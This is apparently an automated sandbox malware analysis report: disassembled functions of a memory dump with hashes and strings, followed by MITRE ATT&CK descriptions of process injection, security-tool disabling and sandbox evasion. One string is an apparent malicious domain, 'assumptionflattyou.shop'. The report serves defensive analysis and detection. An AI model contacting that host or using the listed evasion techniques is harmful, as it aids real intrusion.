Instruction Fuzzy Hash: FD52E4B16083458BCB14CF28C0806ABBBE1BFC5314F198A7EE9D967391D778E945CB85

Function 00406C10 Relevance: .5, Instructions: 459COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 068655e75876c425d1279b5b077750cc74d873baf3c611e11fc7a02e085f60e1
Instruction ID: 155c97648d9e8306b11001f1ffe9ac2dc30d5153d9eee072c4c32168f1851c9e
Opcode Fuzzy Hash: 068655e75876c425d1279b5b077750cc74d873baf3c611e11fc7a02e085f60e1
Instruction Fuzzy Hash: 5EF1BD756083418FD724CF29C88166BFBE2AFD9304F088C2DE8D587792E639E944CB56

Function 00411138 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 127459a40dd156f66946a3f3660c0b0ffd3fc61cae3ea7173ff9f99820ce6467
Instruction ID: c844b84ad5131b86cef9018f8ddeadb3a9ae053d1c6382ca92e20eca21e9be0d
Opcode Fuzzy Hash: 127459a40dd156f66946a3f3660c0b0ffd3fc61cae3ea7173ff9f99820ce6467
Instruction Fuzzy Hash: 10C137706083859FE320DF24D481BAFBBE5EF86389F44582DE4C997661E3389944CB1B

Function 00438860 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53d2c2f32efb1260e4e7ae0f06eb7a6ed9125c19ccaa1cf78237d68b6c5cbdd5
Instruction ID: fa2a3a229e10f124bd619c7aed6692ab061a0d4208a56b87d2f2a394e83bf1e6
Opcode Fuzzy Hash: 53d2c2f32efb1260e4e7ae0f06eb7a6ed9125c19ccaa1cf78237d68b6c5cbdd5
Instruction Fuzzy Hash: FE91AD742083068BC714EF18C490A2BF3E1EF89740F14992EF9958B351EB39EC51CB9A

Function 00438280 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 526778f819f61164a63596b1379ae5de48033a98ca701539595140c6edf1c5fc
Instruction ID: 1228f0d22be123eb23f19b185b4996638aff095672854f9e815ad5e08f8fbe31
Opcode Fuzzy Hash: 526778f819f61164a63596b1379ae5de48033a98ca701539595140c6edf1c5fc
Instruction Fuzzy Hash: 7A81C1342083429BD711DF18C880A2BF7E2EF99754F14991DF5C49B361EB39EC518B9A

Function 0041F38A Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8004d71d8110e8df4639a8a646969a19bbcd0153aeb6b77dfefdd36515859b99
Instruction ID: a046821352e3d0a8a7b4ffffd7799053798f3b3f72d958c59e966be740c9e683
Opcode Fuzzy Hash: 8004d71d8110e8df4639a8a646969a19bbcd0153aeb6b77dfefdd36515859b99
Instruction Fuzzy Hash: D4919071E00216CFCB18CF69D8917AEF7B1FF89304F1841A9D515AB392D738A986CB94

Function 0041CD30 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e834a441b260eb3ccc8811f3165624c006a58da777ab1f15c5f3702d2b9e48ef
Instruction ID: 487874ed3c41d75b4920d22756bd8cdcdebd8722e78173755f277ff4a3938371
Opcode Fuzzy Hash: e834a441b260eb3ccc8811f3165624c006a58da777ab1f15c5f3702d2b9e48ef
Instruction Fuzzy Hash: C571A8B05483408BD314DF18D891A6BBBF1EF96758F148A1EF4C54B3A1E338D985CB9A

Function 004033F0 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36ef418476adb566e43b49e5732d9a53f311a4899256dd8fe7f64fc6246cdc27
Instruction ID: a5917ed31327660eaa28ee78c62b5f499c8c4aee543db057b85df56000fe2ca2
Opcode Fuzzy Hash: 36ef418476adb566e43b49e5732d9a53f311a4899256dd8fe7f64fc6246cdc27
Instruction Fuzzy Hash: 9F61B4B15007019FE3149F28DC48217BBE5FF80329F184739E46A663E1D335EA65CB8A

Function 00430090 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a6b4d7ee066099356e3574cf8ee8f9d5a9defec433db4738040a979379c2b12
Instruction ID: 99c7b2ddef0afe3769d9cf043a42036a192323817deed2b617bef494d33a732a
Opcode Fuzzy Hash: 6a6b4d7ee066099356e3574cf8ee8f9d5a9defec433db4738040a979379c2b12
Instruction Fuzzy Hash: A931D275B083188BC714EF59CC8166BF3E6EFC9704F18E62EE48487315E679D906878A

Function 00437D50 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a720fd7d43ecb916973c07741c259b36a8589bfc121c9cbd37e4543aa0589a1
Instruction ID: 70406dad0a3fa19ae1fbf81b6ba44d22e2a92980d0e3a4639aa21cd3a5e6e6ef
Opcode Fuzzy Hash: 6a720fd7d43ecb916973c07741c259b36a8589bfc121c9cbd37e4543aa0589a1
Instruction Fuzzy Hash: D221BCB560C301ABD724CF04C880A6BB7E2EFCA744F14981EE8948B341D334DD00DB9A

Function 00435AFC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a89dac40d8bd930fe6dec24184eea1d47cbdb1e84e9b503c54542638d50c5976
Instruction ID: 8ceb307f1a867d2a2ce871a9809c692d6971833a58326fc0df80769d2fa7ace5
Opcode Fuzzy Hash: a89dac40d8bd930fe6dec24184eea1d47cbdb1e84e9b503c54542638d50c5976
Instruction Fuzzy Hash: 9B21AC7050C3428BD300DF14D88022BBBE0FB9A355F149C2EE085CB261C339D889EB9A

Function 0042B110 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 74e947de6701331a9ca873405e70773d52ced5a4fd02c3e57fb06152c70883a6
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: B3112C33B041E40EC3128D3C9450575BFE34A93374F5D839AF4B8972D6D7268D8A83A9

Function 00421140 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0407378e7c1988491149c353f1688655eee10492070306ef73fee88f655f93dc
Instruction ID: 3342cd56ed713b768d3fee182a2bf905e26c6f010b6d698aca076d041a9fdaa1
Opcode Fuzzy Hash: 0407378e7c1988491149c353f1688655eee10492070306ef73fee88f655f93dc
Instruction Fuzzy Hash: 5001D8F2B0031157E7209E52A4C1737B3A85FA9718F48453EEA0457352DB7EEC25C299

Function 0042AC4C Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9cd90493afbcf3a787d40e6ae72a867081c24d3f7d07c59518c094a7ede77d4
Instruction ID: fb9c94caa665f87f385907187c6146c9335815fe2eddb3d43803afd4d04e7f54
Opcode Fuzzy Hash: d9cd90493afbcf3a787d40e6ae72a867081c24d3f7d07c59518c094a7ede77d4
Instruction Fuzzy Hash: 7E21B7F0904B00AFD360EF39C906757BEE8EB49250F108A1EF9EA87791D771A4158BD6

Function 00401BF4 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe7fe7d5d5a14378e794d14dee7d493a8db410d2c09c2598efe69584864b76e
Instruction ID: 0744f078a3171a0580d2e94a6004f0e5a604781e0de8b4b0d6ae5927e8051cc6
Opcode Fuzzy Hash: abe7fe7d5d5a14378e794d14dee7d493a8db410d2c09c2598efe69584864b76e
Instruction Fuzzy Hash: 9E115A71504B05CFE324AF19C882522B7F0FF16302F041AAEC1D5A7721D339E596CB8A

Function 00413130 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc14459cc490d62ef50881fd369e13876f86137c13df765c3e224478c1acded9
Instruction ID: 864ccd0fb000f695d90a634c81a09cfdd4fb7e0675c21685558bf5890387d05a
Opcode Fuzzy Hash: cc14459cc490d62ef50881fd369e13876f86137c13df765c3e224478c1acded9
Instruction Fuzzy Hash: 44F0ECB160411077DB228E559CC0FB7BB9DCB87315F1D0426E88557242D1655986C3EA

Function 00436280 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99a30cb5aceca96eacf9c01e44222f8d84da01fef9bdfeb224193977f6be1824
Instruction ID: 8e02ec3fbb21446d0e3b3abb1bf3f96b314bcfd9f6689de6b1aee77edabc22c4
Opcode Fuzzy Hash: 99a30cb5aceca96eacf9c01e44222f8d84da01fef9bdfeb224193977f6be1824
Instruction Fuzzy Hash: 03F0F63060C2418FD309EF15C4A092BBBF6EF96745F21991EE1C2472A1D63598A5CB9A

Function 00432210 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab7c002bbd1d2b19c651350f826b154a225611c78f68c3023b16f09186cf9dc2
Instruction ID: 646ad6f42c03963388111ef06097d1b51d9dff72028faada1df9dc79367c8402
Opcode Fuzzy Hash: ab7c002bbd1d2b19c651350f826b154a225611c78f68c3023b16f09186cf9dc2
Instruction Fuzzy Hash: 3BE0C237B0522106A7A8CE36AC01677F3E1EBCA711F4DA46EE042D3208D238C8418269

Function 00401E57 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32ec159fb1e8baa5a06c0379accc7af5b325d4415c182fab87ce06ccca47088d
Instruction ID: 825f81d249fc7c2b3b8fd02e010147e91827b29c8c3219e417adbeef69ccc91b
Opcode Fuzzy Hash: 32ec159fb1e8baa5a06c0379accc7af5b325d4415c182fab87ce06ccca47088d
Instruction Fuzzy Hash: 81D012704083C0CFC3269F7A84D4031FFF0AB53201F082A9DC1D163512C674A24CD759

Function 00401E3C Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e015d6c357b2cfc46d78203d893cf43299e4c7a463b965b74652dba6349ad9dd
Instruction ID: 208e7c7865d3c15796767fa78808d01ca5d58271841f0dbd6d810dd0fb23a9d9
Opcode Fuzzy Hash: e015d6c357b2cfc46d78203d893cf43299e4c7a463b965b74652dba6349ad9dd
Instruction Fuzzy Hash: 36B09221A4C381CAC2045E348290434FAF45A83382F18347880C03342182348544961E

Function 00427FBF Relevance: 54.4, APIs: 1, Strings: 30, Instructions: 110
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 00427FC9

Strings

', xrefs: 0042800A
!, xrefs: 0042803A
/, xrefs: 0042804A
x, xrefs: 00428052
y, xrefs: 004281FA
L, xrefs: 00428062
), xrefs: 0042807A
+, xrefs: 0042806A
F, xrefs: 00428102
`, xrefs: 00428072
m, xrefs: 00428012
i, xrefs: 00428022
#, xrefs: 0042802A
s, xrefs: 004281AA
%, xrefs: 0042801A
-, xrefs: 0042805A
G, xrefs: 004280F2
}, xrefs: 004281DA
e, xrefs: 0042821A
;, xrefs: 00427FEA
g, xrefs: 0042820A
u, xrefs: 0042819A
q, xrefs: 004281BA
q, xrefs: 00427FF2
r, xrefs: 004280B2
{, xrefs: 004281EA
w, xrefs: 0042818A
f, xrefs: 00428212
9, xrefs: 00427FFA
@, xrefs: 00428042

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString
String ID: !$#$%$'$)$+$-$/$9$;$@$F$G$L$`$e$f$g$i$m$q$q$r$s$u$w$x$y${$}
API String ID: 2525500382-184647877
Opcode ID: f313cd3e6c3c74b4c7d6e55d8df0cff20f31d5ffbac6f4c66b038fe8d6c8fc08
Instruction ID: b7ff39a961a08a92465b05a2fcf1e7126ec40a30fea22ecf834f950a24c2b2f5
Opcode Fuzzy Hash: f313cd3e6c3c74b4c7d6e55d8df0cff20f31d5ffbac6f4c66b038fe8d6c8fc08
Instruction Fuzzy Hash: 3C71802050D7C1CDE332C7689848B9BBED16BA7318F084A9ED1ED5B2D2C3BA5549C727

Function 0042927A Relevance: 29.8, APIs: 2, Strings: 15, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00429284
VariantInit.OLEAUT32 ref: 00429297

Strings

T, xrefs: 00429382
%, xrefs: 004292DA
#, xrefs: 004292CA
O, xrefs: 00429342
), xrefs: 00429392
D, xrefs: 00429302
!, xrefs: 004292BA
H, xrefs: 00429312
*, xrefs: 00429322
W, xrefs: 00429372
1, xrefs: 00429352
', xrefs: 004292EA
=, xrefs: 004292F2
I, xrefs: 00429332
<, xrefs: 00429362

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$#$%$'$)$*$1$<$=$D$H$I$O$T$W
API String ID: 2610073882-490708954
Opcode ID: 2d1f05bfaac1dc43aa837fe879617a49f6efda1a223bae83672551efda08642e
Instruction ID: 7f15bc0b4b888700497e6a5c597d18a2f9d32770e2fb9fd3c8e7a25793a5d04b
Opcode Fuzzy Hash: 2d1f05bfaac1dc43aa837fe879617a49f6efda1a223bae83672551efda08642e
Instruction Fuzzy Hash: FD51F67000C7C28AD332DB6894487DEBFE06BA2324F048A6DE1E8476D2D7B54589C763

Function 0042797A Relevance: 24.6, APIs: 2, Strings: 12, Instructions: 79COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00427984
VariantInit.OLEAUT32 ref: 00427997

Strings

J, xrefs: 00427A22
-, xrefs: 00427A72
5, xrefs: 00427A32
M, xrefs: 00427A52
K, xrefs: 00427A62
=, xrefs: 00427A12
!, xrefs: 004279BA
#, xrefs: 004279CA
D, xrefs: 004279F2
&, xrefs: 00427A42
', xrefs: 004279EA
%, xrefs: 004279DA

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$#$%$&$'$-$5$=$D$J$K$M
API String ID: 2610073882-2184588229
Opcode ID: bb2ab71c1f6c2cd37f8ae824c0502d6ec6243625ac73289c60a0569c4817a6e7
Instruction ID: 015ba4d9e612af17b2960f3274dcde5396338608fb32c7b17c0d90787f3d7c52
Opcode Fuzzy Hash: bb2ab71c1f6c2cd37f8ae824c0502d6ec6243625ac73289c60a0569c4817a6e7
Instruction Fuzzy Hash: 5241D36010C7C1CED332DB38954979EBFE0AB92324F048A9DE4EC87292DB758509DB67

Function 00427E5B Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 75COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00427E65
VariantInit.OLEAUT32 ref: 00427E78

Strings

/, xrefs: 00427ED4
', xrefs: 00427EAC
;, xrefs: 00427E98
-, xrefs: 00427EDE
%, xrefs: 00427EB6
9, xrefs: 00427EA2
!, xrefs: 00427ECA
), xrefs: 00427EF2
#, xrefs: 00427EC0
+, xrefs: 00427EE8

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$#$%$'$)$+$-$/$9$;
API String ID: 2610073882-2318925594
Opcode ID: 0a2e9bafe7d24be67910d26c28a8ff85a4e99bdfa7abb1d9a731de16c41bb722
Instruction ID: 0676460745a6f27c1b848bda3cad644b7837a00283a165a303822dbff343d47f
Opcode Fuzzy Hash: 0a2e9bafe7d24be67910d26c28a8ff85a4e99bdfa7abb1d9a731de16c41bb722
Instruction Fuzzy Hash: 5F41E47000CBC18ED322DB78944879EFFE0AB96314F584A9DE5E5873A2C7748549DB53

Function 0040D080 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 293COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(930591D3,00000104), ref: 0040D4DF

Strings

wu, xrefs: 0040D329
:123, xrefs: 0040D397
tw, xrefs: 0040D419
assumptionflattyou.shop, xrefs: 0040D4AC
Mq, xrefs: 0040D308

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: DirectorySystem
String ID: :123$Mq$assumptionflattyou.shop$tw$wu
API String ID: 2188284642-1420097387
Opcode ID: 204e44f21f05f6d9725217fa632c7c31054448c14a5f36ad4aa0fc8192fd4be1
Instruction ID: 7a0324817b1d23c499b212801a3df83f41ac1dbd6145a4260683a3088d64cb4e
Opcode Fuzzy Hash: 204e44f21f05f6d9725217fa632c7c31054448c14a5f36ad4aa0fc8192fd4be1
Instruction Fuzzy Hash: 22B16AB050D3C18BE3359F15D5A4BABBBE1AFC6348F040AAED4C92B391C7355905CB9A

Function 00428C1B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 00428C25

Strings

5, xrefs: 00428CF4
5, xrefs: 00428CE5

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: String
String ID: 5$5
API String ID: 2568140703-2059066348
Opcode ID: 110300df1bd1ba2ebeec1dea9ca7ca6fb67ca027417a09c175717f201296cffc
Instruction ID: 87350df41a40c2f6dc17ee1355bf02e3aba54a30ab7b9e221eebbe2b7547dbda
Opcode Fuzzy Hash: 110300df1bd1ba2ebeec1dea9ca7ca6fb67ca027417a09c175717f201296cffc
Instruction Fuzzy Hash: 6761A2717093908FC3258E2CD49039EBBE2AFD9314F594A2EE8E9C7381DB789805D746

Function 00428E58 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 00428E62

Strings

5, xrefs: 00428F43
5, xrefs: 00428F34

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: String
String ID: 5$5
API String ID: 2568140703-2059066348
Opcode ID: ad2e3da341f48bfdef764f4f0a06b9de312e9cc779397da2adcb9a917610175f
Instruction ID: 9d87ac8fdee30071d36def9c5e7e5cc6c586f1880d67323fe9e0400e7f3affeb
Opcode Fuzzy Hash: ad2e3da341f48bfdef764f4f0a06b9de312e9cc779397da2adcb9a917610175f
Instruction Fuzzy Hash: D36197717093908FC725CF28C49039EBBE2ABD9314F598A2DE8E997381DB399C45C746

Function 00422C93 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00422CCC
GetSystemMetrics.USER32 ref: 00422CDB

Strings

, xrefs: 00422D86

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: e2bfdd665439a88b9fb695f7aa0b4cbfc992b72b2f88fc7f19c4bf93d57cb1af
Instruction ID: a27347ba28fd9ac01b1c64968218bc3745f68d8fcc187890a7882a3051f6c828
Opcode Fuzzy Hash: e2bfdd665439a88b9fb695f7aa0b4cbfc992b72b2f88fc7f19c4bf93d57cb1af
Instruction Fuzzy Hash: 563170B09143049FDB00EF6CD98565EBBF4FB88304F11892DE588DB361E774A958CB86

Function 004286E1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004286EB

Strings

9, xrefs: 00428706
n, xrefs: 00428736

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: InitVariant
String ID: 9$n
API String ID: 1927566239-2400824052
Opcode ID: b1a6aed9f329aa4345f78be316963d03f815953c8a799474bbcf7e0680ec7796
Instruction ID: fd41c295578004fdf0f7040fe24ad36ee7534973189a4dc472ddedb26a7efe9d
Opcode Fuzzy Hash: b1a6aed9f329aa4345f78be316963d03f815953c8a799474bbcf7e0680ec7796
Instruction Fuzzy Hash: BE31DD7410C3C18ED3329B28C4987DEBFE0AB9A324F180A9DE0E987392C7758155CB57

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

